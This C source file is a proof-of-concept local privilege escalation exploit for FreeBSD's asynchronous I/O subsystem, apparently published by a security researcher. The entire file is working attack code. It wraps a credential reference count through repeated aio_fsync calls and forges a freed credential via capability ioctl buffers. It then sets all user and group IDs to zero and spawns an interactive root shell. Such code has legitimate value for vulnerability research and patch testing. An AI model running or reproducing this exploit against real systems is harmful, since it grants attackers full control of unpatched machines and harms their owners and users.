/*
 * FreeBSD 11.0-12.3 aio LPE PoC
 * By chris@accessvector.net (@accessvector) / 2022-Jun-26
 */
#define _WANT_UCRED

#include <ctype.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <sys/aio.h>
#include <sys/cpuset.h>
#include <sys/capsicum.h>
#include <sys/param.h>
#include <sys/ucred.h>
#include <time.h>
#include <unistd.h>

#include "libpoc.h"

const char *poc_title   = "FreeBSD 11.0-13.0 aio LPE PoC";
const char *poc_author  = "chris@accessvector.net (@accessvector)";

#define HOURS(s)        ((s) / (60 * 60))
#define MINUTES(s)      (((s) / 60) % 60)
#define SECONDS(s)      ((s) % 60)
#define ALIGNUP(a, b)   (((a) + (b) - 1) / (b))

static char dummy = 0;
static int fd_ucred_1;
static int fd_ucred_2;
static struct aiocb vuln_iocb;
static struct aiocb inflight_iocb = {
    .aio_buf        = &dummy,
    .aio_nbytes     = 1
};

static void
pin_to_cpu(size_t which)
{
    cpuset_t cs;

    CPU_ZERO(&cs);
    CPU_SET(which, &cs);

    expect(cpuset_setaffinity(CPU_LEVEL_WHICH, CPU_WHICH_PID, -1,
                sizeof(cs), &cs));
}

static void
fresh_ucred(void)
{
    expect(setuid(getuid()));
}

static void
launch_inflight_aio(void)
{
    expect(aio_read(&inflight_iocb));
}

static void
collect_inflight_aio(void)
{
    struct aiocb *iocbp;
    expect(aio_waitcomplete(&iocbp, NULL));
}

static void
bump_ucred_refcount(unsigned int how_much)
{
    unsigned int n;
    unsigned int percent;
    time_t start_time;
    time_t elapsed;
    time_t remaining;

    start_time = time(NULL);

    for (n = 0; n < how_much; ++n) {
        if (-1 != aio_fsync(O_SYNC, &vuln_iocb))
            log_fatal("aio_fsync call was unexpectedly successful");

        if ((n & 0xfffff) == 0) {
            percent = (unsigned int)(((unsigned long)n * 100) / how_much);
            elapsed = time(NULL) - start_time;
            remaining = (n > 0) ? ((elapsed * (how_much - n)) / n) : 0;

            log_progress("Progress: %u / %u (%u%%) (%02u:%02u:%02u elapsed, "
                    "%02u:%02u:%02u remaining)...",
                    n, how_much, percent,
                    HOURS(elapsed), MINUTES(elapsed), SECONDS(elapsed),
                    HOURS(remaining), MINUTES(remaining), SECONDS(remaining));
        }
    }

    log_progress_complete();

    elapsed = time(NULL) - start_time;
    log_info("Wrap completed in %02u:%02u:%02u", HOURS(elapsed),
            MINUTES(elapsed), SECONDS(elapsed));
}

static void
allocate_fake_ucred(void)
{
    cap_ioctl_t buf[ALIGNUP(sizeof(struct ucred), sizeof(cap_ioctl_t))];
    struct ucred *cred = (struct ucred *)buf;

    bzero(buf, sizeof(buf));
    cred->cr_ref = 1;

#if __FreeBSD_version >= 1300000
    cred->cr_mtx.lock_object.lo_flags = 0x01030000;
#endif

    expect(cap_ioctls_limit(fd_ucred_1, buf, ARRAYLEN(buf)));
}

static void
fixup_ucred(void)
{
    cap_ioctl_t buf[ALIGNUP(sizeof(struct ucred), sizeof(cap_ioctl_t))];
    struct ucred *cred = (struct ucred *)buf;

    bzero(buf, sizeof(buf));

    expect(cap_ioctls_get(fd_ucred_1, buf, ARRAYLEN(buf)));

    log_hexdump(cred, sizeof(struct ucred), "Read credential uid=%u, gid=%u",
            cred->cr_uid, cred->cr_smallgroups[0]);

    cred->cr_ref++;
    cred->cr_uid            = 0;
    cred->cr_ruid           = 0;
    cred->cr_svuid          = 0;
    cred->cr_smallgroups[0] = 0;
    cred->cr_rgid           = 0;
    cred->cr_svgid          = 0;

    expect(cap_ioctls_limit(fd_ucred_1, NULL, 0));
    expect(cap_ioctls_limit(fd_ucred_2, buf, ARRAYLEN(buf)));
}

static void
drop_shell(void)
{
    char * const av[] = { "/bin/sh", "-i", NULL };
    char * const ev[] = { "PATH=/bin:/sbin:/usr/bin:/usr/sbin", NULL };

    expect(execve(av[0], av, ev));
}

static void
setup(void)
{
    pin_to_cpu(0);

    expect(vuln_iocb.aio_fildes = open("/dev/null", O_RDONLY | O_CLOEXEC));
    expect(fd_ucred_1 = open("/etc/passwd", O_RDONLY | O_CLOEXEC));
    expect(fd_ucred_2 = open("/etc/passwd", O_RDONLY | O_CLOEXEC));

    expect(inflight_iocb.aio_fildes = open("/etc/passwd", O_RDONLY |
                O_CLOEXEC));
}

int
main(int argc, char *argv[])
{
    banner();

    log_info("Setting up");
    setup();

    log_info("1. Allocating a fresh credential");
    fresh_ucred();

    log_info("2. Launching in-flight async I/O job");
    launch_inflight_aio();

    log_info("3. Triggering vulnerability to wrap credential refcount");
    bump_ucred_refcount((unsigned int)-1);

    log_info("4. Getting a new credential");
    fresh_ucred();

    log_info("5. Allocating fake credential");
    allocate_fake_ucred();

    log_info("6. Collecting in-flight async I/O job to free fake credential");
    collect_inflight_aio();

    log_info("7. Getting another new credential");
    fresh_ucred();

    log_info("8. Fixing up credential");
    fixup_ucred();

    log_info("9. Securing a real root credential");
    fresh_ucred();

    log_info("10. Enjoy the root life");
    drop_shell();

    return 0;
}
